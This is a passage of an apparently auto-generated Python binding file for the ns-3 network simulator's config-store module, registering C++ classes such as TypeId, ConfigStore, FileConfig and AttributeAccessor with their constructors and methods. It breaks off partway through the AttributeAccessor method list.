## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3FileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3GtkConfigStore_methods(root_module, cls):
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
cls.add_constructor([])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
return
def register_Ns3NoneFileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_virtual=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3ConfigStore_methods(root_module, cls):
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
cls.add_constructor([])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
cls.add_method('SetFileFormat',
'void',
[param('ns3::ConfigStore::FileFormat', 'format')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::ConfigStore::Mode', 'mode')])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
